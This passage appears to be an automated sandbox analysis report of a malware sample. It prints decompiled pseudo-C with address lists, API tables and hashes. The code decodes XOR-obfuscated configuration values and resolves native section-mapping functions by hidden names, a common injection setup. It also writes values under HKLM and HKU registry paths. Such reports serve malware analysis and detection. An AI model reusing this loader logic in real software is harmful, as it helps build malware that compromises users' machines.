                                                                                                                                                                                              						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                                                                                                                                                                              							 *0xdfd244 = _v8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t31 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t58 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t31 = E00DF10CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                                                              						_t72 =  &_v8;
                                                                                                                                                                                              						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                              							 *0xdfd248 = _v8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t32 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t54 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t32 = E00DF10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                              						_t72 =  &_v8;
                                                                                                                                                                                              						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                              							 *0xdfd004 = _v8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t50 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t33 = E00DF10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t33 != 0) {
                                                                                                                                                                                              						_t72 =  &_v8;
                                                                                                                                                                                              						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                              							 *0xdfd02c = _v8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t34 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t46 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t34 = E00DF10CA(_t72, _t70, _t46 ^ 0x163b337e);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t34 != 0) {
                                                                                                                                                                                              						_push(_t34);
                                                                                                                                                                                              						_t43 = 0x10;
                                                                                                                                                                                              						_t44 = E00DFA2EF(_t43);
                                                                                                                                                                                              						if(_t44 != 0) {
                                                                                                                                                                                              							_push(_t44);
                                                                                                                                                                                              							E00DF9B10();
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                                                              						_t35 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t41 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              						_t35 = E00DF10CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t35 != 0 && E00DFA2EF(0, _t35) != 0) {
                                                                                                                                                                                              						_t86 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              						E00DF4C3A(_t86 + 4, _t39);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _t70);
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}





























                                                                                                                                                                                              0x00df98f7
                                                                                                                                                                                              0x00df98f7
                                                                                                                                                                                              0x00df98f7
                                                                                                                                                                                              0x00df98f7
                                                                                                                                                                                              0x00df98fa
                                                                                                                                                                                              0x00df98fb
                                                                                                                                                                                              0x00df98fc
                                                                                                                                                                                              0x00df9916
                                                                                                                                                                                              0x00df9924
                                                                                                                                                                                              0x00df9924
                                                                                                                                                                                              0x00df9929
                                                                                                                                                                                              0x00df9943
                                                                                                                                                                                              0x00df9ad2
                                                                                                                                                                                              0x00df9ad4
                                                                                                                                                                                              0x00df9949
                                                                                                                                                                                              0x00df9949
                                                                                                                                                                                              0x00df994a
                                                                                                                                                                                              0x00df994d
                                                                                                                                                                                              0x00df994e
                                                                                                                                                                                              0x00df9953
                                                                                                                                                                                              0x00df9969
                                                                                                                                                                                              0x00df9955
                                                                                                                                                                                              0x00df9955
                                                                                                                                                                                              0x00df9962
                                                                                                                                                                                              0x00df9962
                                                                                                                                                                                              0x00df9973
                                                                                                                                                                                              0x00df9975
                                                                                                                                                                                              0x00df997f
                                                                                                                                                                                              0x00df9984
                                                                                                                                                                                              0x00df9984
                                                                                                                                                                                              0x00df997f
                                                                                                                                                                                              0x00df998b
                                                                                                                                                                                              0x00df99a1
                                                                                                                                                                                              0x00df998d
                                                                                                                                                                                              0x00df998d
                                                                                                                                                                                              0x00df999a
                                                                                                                                                                                              0x00df999a
                                                                                                                                                                                              0x00df99a5
                                                                                                                                                                                              0x00df99a7
                                                                                                                                                                                              0x00df99b1
                                                                                                                                                                                              0x00df99b6
                                                                                                                                                                                              0x00df99b6
                                                                                                                                                                                              0x00df99b1
                                                                                                                                                                                              0x00df99bd
                                                                                                                                                                                              0x00df99d3
                                                                                                                                                                                              0x00df99bf
                                                                                                                                                                                              0x00df99bf
                                                                                                                                                                                              0x00df99cc
                                                                                                                                                                                              0x00df99cc
                                                                                                                                                                                              0x00df99d7
                                                                                                                                                                                              0x00df99d9
                                                                                                                                                                                              0x00df99e3
                                                                                                                                                                                              0x00df99e8
                                                                                                                                                                                              0x00df99e8
                                                                                                                                                                                              0x00df99e3
                                                                                                                                                                                              0x00df99ef
                                                                                                                                                                                              0x00df9a05
                                                                                                                                                                                              0x00df99f1
                                                                                                                                                                                              0x00df99f1
                                                                                                                                                                                              0x00df99fe
                                                                                                                                                                                              0x00df99fe
                                                                                                                                                                                              0x00df9a09
                                                                                                                                                                                              0x00df9a0b
                                                                                                                                                                                              0x00df9a15
                                                                                                                                                                                              0x00df9a1a
                                                                                                                                                                                              0x00df9a1a
                                                                                                                                                                                              0x00df9a15
                                                                                                                                                                                              0x00df9a21
                                                                                                                                                                                              0x00df9a37
                                                                                                                                                                                              0x00df9a23
                                                                                                                                                                                              0x00df9a23
                                                                                                                                                                                              0x00df9a30
                                                                                                                                                                                              0x00df9a30
                                                                                                                                                                                              0x00df9a3b
                                                                                                                                                                                              0x00df9a3d
                                                                                                                                                                                              0x00df9a47
                                                                                                                                                                                              0x00df9a4c
                                                                                                                                                                                              0x00df9a4c
                                                                                                                                                                                              0x00df9a47
                                                                                                                                                                                              0x00df9a53
                                                                                                                                                                                              0x00df9a69
                                                                                                                                                                                              0x00df9a55
                                                                                                                                                                                              0x00df9a55
                                                                                                                                                                                              0x00df9a62
                                                                                                                                                                                              0x00df9a62
                                                                                                                                                                                              0x00df9a6d
                                                                                                                                                                                              0x00df9a6f
                                                                                                                                                                                              0x00df9a72
                                                                                                                                                                                              0x00df9a73
                                                                                                                                                                                              0x00df9a7a
                                                                                                                                                                                              0x00df9a7c
                                                                                                                                                                                              0x00df9a7d
                                                                                                                                                                                              0x00df9a7d
                                                                                                                                                                                              0x00df9a7a
                                                                                                                                                                                              0x00df9a84
                                                                                                                                                                                              0x00df9a9a
                                                                                                                                                                                              0x00df9a86
                                                                                                                                                                                              0x00df9a86
                                                                                                                                                                                              0x00df9a93
                                                                                                                                                                                              0x00df9a93
                                                                                                                                                                                              0x00df9a9e
                                                                                                                                                                                              0x00df9aac
                                                                                                                                                                                              0x00df9ab6
                                                                                                                                                                                              0x00df9ab6
                                                                                                                                                                                              0x00df9ac3
                                                                                                                                                                                              0x00df9acf
                                                                                                                                                                                              0x00df9acf

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF997B
                                                                                                                                                                                              • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF99AD
                                                                                                                                                                                              • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF99DF
                                                                                                                                                                                              • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF9A11
                                                                                                                                                                                              • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF9A43
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,00DF4A8B), ref: 00DF9AC3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                              • Opcode ID: 961d36d8f4add233db4e63d16a841734161ecb6dbf51e885c2e465c0ede3c158
                                                                                                                                                                                              • Instruction ID: a4c8a7a53256d6fcfb4250e0f95b381710aed6c9489e51084dd459bcc21584f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 961d36d8f4add233db4e63d16a841734161ecb6dbf51e885c2e465c0ede3c158
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5518671E00208EEC710EBB89D94E7BB2EEE78870076AD925A701D7248EA71DD40DA74
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DF13B5
                                                                                                                                                                                              • SysAllocString.OLEAUT32(0070006F), ref: 00DF13C9
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DF13DB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF1443
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF1452
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF145D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: fe2e9a508b117f223393afd23ed0ec2f08b438171d915a4cd52a99032422218f
                                                                                                                                                                                              • Instruction ID: ca7e37ffdcf9d2c7577d6223db403a4ce4d636d371a942f61e500c673210fba5
                                                                                                                                                                                              • Opcode Fuzzy Hash: fe2e9a508b117f223393afd23ed0ec2f08b438171d915a4cd52a99032422218f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C541313590060DEBDB01DFB8D8446AEB7B9EF89301F158465EE14EB220DA71DD46CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                              				_Unknown_base(*)()* _t35;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				_Unknown_base(*)()* _t38;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				_Unknown_base(*)()* _t41;
                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                              				struct HINSTANCE__* _t48;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t54 = E00DF58BE(0x20);
                                                                                                                                                                                              				if(_t54 == 0) {
                                                                                                                                                                                              					_v8 = 8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t23 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t1 = _t23 + 0xdfe11a; // 0x4c44544e
                                                                                                                                                                                              					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                              					_t26 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t2 = _t26 + 0xdfe769; // 0x7243775a
                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                              					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                              					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                              					if(_t28 == 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						E00DF147E(_t54);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t30 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t5 = _t30 + 0xdfe756; // 0x614d775a
                                                                                                                                                                                              						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                              						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t33 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							_t7 = _t33 + 0xdfe40b; // 0x6e55775a
                                                                                                                                                                                              							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                              							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                              							if(_t35 == 0) {
                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t36 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              								_t9 = _t36 + 0xdfe4d2; // 0x4e6c7452
                                                                                                                                                                                              								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                              								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                              								if(_t38 == 0) {
                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t39 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              									_t11 = _t39 + 0xdfe779; // 0x6c43775a
                                                                                                                                                                                              									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                              									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                              									if(_t41 == 0) {
                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                              										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                              										_t44 = E00DF7B01(_t54, _a8);
                                                                                                                                                                                              										_v8 = _t44;
                                                                                                                                                                                              										if(_t44 != 0) {
                                                                                                                                                                                              											goto L8;
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											 *_a12 = _t54;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              0x00df57e7
                                                                                                                                                                                              0x00df57eb
                                                                                                                                                                                              0x00df58ad
                                                                                                                                                                                              0x00df57f1
                                                                                                                                                                                              0x00df57f1
                                                                                                                                                                                              0x00df57f6
                                                                                                                                                                                              0x00df5809
                                                                                                                                                                                              0x00df580b
                                                                                                                                                                                              0x00df5810
                                                                                                                                                                                              0x00df5818
                                                                                                                                                                                              0x00df581f
                                                                                                                                                                                              0x00df5821
                                                                                                                                                                                              0x00df5826
                                                                                                                                                                                              0x00df58a5
                                                                                                                                                                                              0x00df58a6
                                                                                                                                                                                              0x00df5828
                                                                                                                                                                                              0x00df5828
                                                                                                                                                                                              0x00df582d
                                                                                                                                                                                              0x00df5835
                                                                                                                                                                                              0x00df5837
                                                                                                                                                                                              0x00df583c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df583e
                                                                                                                                                                                              0x00df583e
                                                                                                                                                                                              0x00df5843
                                                                                                                                                                                              0x00df584b
                                                                                                                                                                                              0x00df584d
                                                                                                                                                                                              0x00df5852
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df5854
                                                                                                                                                                                              0x00df5854
                                                                                                                                                                                              0x00df5859
                                                                                                                                                                                              0x00df5861
                                                                                                                                                                                              0x00df5863
                                                                                                                                                                                              0x00df5868
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df586a
                                                                                                                                                                                              0x00df586a
                                                                                                                                                                                              0x00df586f
                                                                                                                                                                                              0x00df5877
                                                                                                                                                                                              0x00df5879
                                                                                                                                                                                              0x00df587e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df5880
                                                                                                                                                                                              0x00df5886
                                                                                                                                                                                              0x00df588b
                                                                                                                                                                                              0x00df5892
                                                                                                                                                                                              0x00df5897
                                                                                                                                                                                              0x00df589c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df589e
                                                                                                                                                                                              0x00df58a1
                                                                                                                                                                                              0x00df58a1
                                                                                                                                                                                              0x00df589c
                                                                                                                                                                                              0x00df587e
                                                                                                                                                                                              0x00df5868
                                                                                                                                                                                              0x00df5852
                                                                                                                                                                                              0x00df583c
                                                                                                                                                                                              0x00df5826
                                                                                                                                                                                              0x00df58bb

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00DF14AF,?,?,?,?,00000000,00000000), ref: 00DF57FD
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DF581F
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DF5835
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DF584B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DF5861
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DF5877
                                                                                                                                                                                                • Part of subcall function 00DF7B01: memset.NTDLL ref: 00DF7B80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1886625739-0
                                                                                                                                                                                              • Opcode ID: 58613082b9fd779a6f43df320aa6399ab85c664202458b43f07ecb793e58000d
                                                                                                                                                                                              • Instruction ID: 8b931d8cd2f8f8fc198dad4b021b511ce25f1eaa440b04e63832de736fffdfd5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 58613082b9fd779a6f43df320aa6399ab85c664202458b43f07ecb793e58000d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D9211CB1600B0AEFDB10EF69DD44D7AB7EDEF4434470A8465E609DB221EA71E905CBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                              			E00DFA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				signed int* _v16;
                                                                                                                                                                                              				void _v284;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				char* _t60;
                                                                                                                                                                                              				intOrPtr* _t61;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				char _t68;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				void* _t97;
                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                              				signed int* _t104;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t97 = __ecx;
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t102 = _a16;
                                                                                                                                                                                              				if(_t102 == 0) {
                                                                                                                                                                                              					__imp__( &_v284,  *0xdfd33c);
                                                                                                                                                                                              					_t96 = 0x80000002;
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					_t60 = E00DFA5E9(0,  &_v284);
                                                                                                                                                                                              					_a8 = _t60;
                                                                                                                                                                                              					if(_t60 == 0) {
                                                                                                                                                                                              						_v8 = 8;
                                                                                                                                                                                              						L29:
                                                                                                                                                                                              						_t61 = _a20;
                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                              							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return _v8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t105 = _a24;
                                                                                                                                                                                              					if(E00DF621D(_t97, _t105, _t96, _t60) != 0) {
                                                                                                                                                                                              						L27:
                                                                                                                                                                                              						E00DF147E(_a8);
                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t65 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t16 = _t65 + 0xdfe8de; // 0x65696c43
                                                                                                                                                                                              					_t68 = E00DFA5E9(0, _t16);
                                                                                                                                                                                              					_a24 = _t68;
                                                                                                                                                                                              					if(_t68 == 0) {
                                                                                                                                                                                              						L14:
                                                                                                                                                                                              						_t29 = _t105 + 0x14; // 0x102
                                                                                                                                                                                              						_t33 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              						if(E00DF4C9A( *_t33, _t96, _a8,  *0xdfd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                              							_t72 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							if(_t102 == 0) {
                                                                                                                                                                                              								_t35 = _t72 + 0xdfea54; // 0x4d4c4b48
                                                                                                                                                                                              								_t73 = _t35;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t34 = _t72 + 0xdfea4f; // 0x55434b48
                                                                                                                                                                                              								_t73 = _t34;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(E00DF30FC( &_a24, _t73,  *0xdfd334,  *0xdfd338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                              								if(_t102 == 0) {
                                                                                                                                                                                              									_t75 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              									_t44 = _t75 + 0xdfe856; // 0x74666f53
                                                                                                                                                                                              									_t78 = E00DFA5E9(0, _t44);
                                                                                                                                                                                              									_t103 = _t78;
                                                                                                                                                                                              									if(_t78 == 0) {
                                                                                                                                                                                              										_v8 = 8;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t47 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              										E00DF1BC1( *_t47, _t96, _a8,  *0xdfd338, _a24);
                                                                                                                                                                                              										_t49 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              										E00DF1BC1( *_t49, _t96, _t103,  *0xdfd330, _a16);
                                                                                                                                                                                              										E00DF147E(_t103);
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t40 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              									E00DF1BC1( *_t40, _t96, _a8,  *0xdfd338, _a24);
                                                                                                                                                                                              									_t43 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              									E00DF1BC1( *_t43, _t96, _a8,  *0xdfd330, _a16);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *_t105 != 0) {
                                                                                                                                                                                              									E00DF147E(_a24);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									 *_t105 = _a16;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t21 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              					if(E00DF74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                              						_t104 = _v16;
                                                                                                                                                                                              						_t88 = 0x28;
                                                                                                                                                                                              						if(_v12 == _t88) {
                                                                                                                                                                                              							 *_t104 =  *_t104 & 0x00000000;
                                                                                                                                                                                              							_t26 = _t105 + 0x10; // 0x3d00dfc0
                                                                                                                                                                                              							E00DF4C9A( *_t26, _t96, _a8, _a24, _t104);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E00DF147E(_t104);
                                                                                                                                                                                              						_t102 = _a16;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF147E(_a24);
                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                              					goto L29;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					memcpy( &_v284, _a8, _t102);
                                                                                                                                                                                              					__imp__(_t106 + _t102 - 0x117,  *0xdfd33c);
                                                                                                                                                                                              					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                                                                                                                              					_t96 = 0x80000003;
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}























                                                                                                                                                                                              0x00dfa642
                                                                                                                                                                                              0x00dfa64b
                                                                                                                                                                                              0x00dfa652
                                                                                                                                                                                              0x00dfa657
                                                                                                                                                                                              0x00dfa6c6
                                                                                                                                                                                              0x00dfa6cc
                                                                                                                                                                                              0x00dfa6d1
                                                                                                                                                                                              0x00dfa6da
                                                                                                                                                                                              0x00dfa6df
                                                                                                                                                                                              0x00dfa6e4
                                                                                                                                                                                              0x00dfa858
                                                                                                                                                                                              0x00dfa85f
                                                                                                                                                                                              0x00dfa85f
                                                                                                                                                                                              0x00dfa864
                                                                                                                                                                                              0x00dfa866
                                                                                                                                                                                              0x00dfa866
                                                                                                                                                                                              0x00dfa86f
                                                                                                                                                                                              0x00dfa86f
                                                                                                                                                                                              0x00dfa6ea
                                                                                                                                                                                              0x00dfa6f6
                                                                                                                                                                                              0x00dfa84e
                                                                                                                                                                                              0x00dfa851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa851
                                                                                                                                                                                              0x00dfa6fc
                                                                                                                                                                                              0x00dfa701
                                                                                                                                                                                              0x00dfa70a
                                                                                                                                                                                              0x00dfa70f
                                                                                                                                                                                              0x00dfa714
                                                                                                                                                                                              0x00dfa75e
                                                                                                                                                                                              0x00dfa75e
                                                                                                                                                                                              0x00dfa771
                                                                                                                                                                                              0x00dfa77b
                                                                                                                                                                                              0x00dfa781
                                                                                                                                                                                              0x00dfa788
                                                                                                                                                                                              0x00dfa792
                                                                                                                                                                                              0x00dfa792
                                                                                                                                                                                              0x00dfa78a
                                                                                                                                                                                              0x00dfa78a
                                                                                                                                                                                              0x00dfa78a
                                                                                                                                                                                              0x00dfa78a
                                                                                                                                                                                              0x00dfa7b4
                                                                                                                                                                                              0x00dfa7bc
                                                                                                                                                                                              0x00dfa7ea
                                                                                                                                                                                              0x00dfa7ef
                                                                                                                                                                                              0x00dfa7f8
                                                                                                                                                                                              0x00dfa7fd
                                                                                                                                                                                              0x00dfa801
